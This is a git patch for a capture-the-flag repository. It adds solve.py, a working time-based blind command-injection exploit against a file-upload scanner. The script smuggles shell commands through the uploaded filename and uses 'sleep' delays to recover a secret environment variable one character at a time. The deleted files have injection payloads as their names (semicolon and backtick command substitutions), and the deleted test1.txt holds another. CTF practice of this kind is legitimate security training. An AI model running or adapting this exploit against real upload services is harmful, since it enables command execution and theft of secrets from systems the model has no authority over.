From c9dbb784b4093c562c55d0c791b9f5b05cb142d8 Mon Sep 17 00:00:00 2001
From: emln <em1l14n0s@gmail.com>
Date: Sun, 10 May 2026 20:43:17 +0200
Subject: [PATCH] Some more CTFs

---
 "web-cmdi/05_virusvault/a `echo \"prova\"`"   |  0
 .../05_virusvault/a\"; echo \"prova\";.jpg"   |  0
 web-cmdi/05_virusvault/a; echo 'a'; .jpg      |  0
 web-cmdi/05_virusvault/solve.py               | 31 +++++++++++++++++++
 web-cmdi/05_virusvault/test1.txt              |  1 -
 5 files changed, 31 insertions(+), 1 deletion(-)
 delete mode 100644 "web-cmdi/05_virusvault/a `echo \"prova\"`"
 delete mode 100644 "web-cmdi/05_virusvault/a\"; echo \"prova\";.jpg"
 delete mode 100644 web-cmdi/05_virusvault/a; echo 'a'; .jpg
 create mode 100644 web-cmdi/05_virusvault/solve.py
 delete mode 100644 web-cmdi/05_virusvault/test1.txt

diff --git "a/web-cmdi/05_virusvault/a `echo \"prova\"`" "b/web-cmdi/05_virusvault/a `echo \"prova\"`"
deleted file mode 100644
index e69de29..0000000
diff --git "a/web-cmdi/05_virusvault/a\"; echo \"prova\";.jpg" "b/web-cmdi/05_virusvault/a\"; echo \"prova\";.jpg"
deleted file mode 100644
index e69de29..0000000
diff --git a/web-cmdi/05_virusvault/a; echo 'a'; .jpg b/web-cmdi/05_virusvault/a; echo 'a'; .jpg
deleted file mode 100644
index e69de29..0000000
diff --git a/web-cmdi/05_virusvault/solve.py b/web-cmdi/05_virusvault/solve.py
new file mode 100644
index 0000000..aba1727
--- /dev/null
+++ b/web-cmdi/05_virusvault/solve.py
@@ -0,0 +1,31 @@
+import string
+import time
+
+import requests
+
+files = {"specimen": ("name.txt; sleep 5", "\r\n", "application/octet-stream")}
+url = "https://552d42c0-a789-405e-82e6-fc37e974d764.offsec.m0lecon.it/scan"
+
+count = 1
+flag = ""
+banned = "/\\"
+while count < 50:
+    for char in string.printable:
+        if char not in banned:
+            # print(f"Testing {char}")
+            files = {
+                "specimen": (
+                    f"name.txt; test $(echo $FLAG | cut -c {count}) = {char} && sleep 2 ",
+                    "\r\n",
+                    "application/octet-stream",
+                )
+            }
+            start = time.perf_counter()
+            response = requests.post(url, files=files)
+            elapsed = time.perf_counter() - start
+            if elapsed > 2:
+                print(f"Found char: {char}")
+                flag += char
+                count = count + 1
+                print(f"Actual flag: {flag}")
+                break
diff --git a/web-cmdi/05_virusvault/test1.txt b/web-cmdi/05_virusvault/test1.txt
deleted file mode 100644
index 597beda..0000000
--- a/web-cmdi/05_virusvault/test1.txt
+++ /dev/null
@@ -1 +0,0 @@
-'a'; $(echo "$FLAG");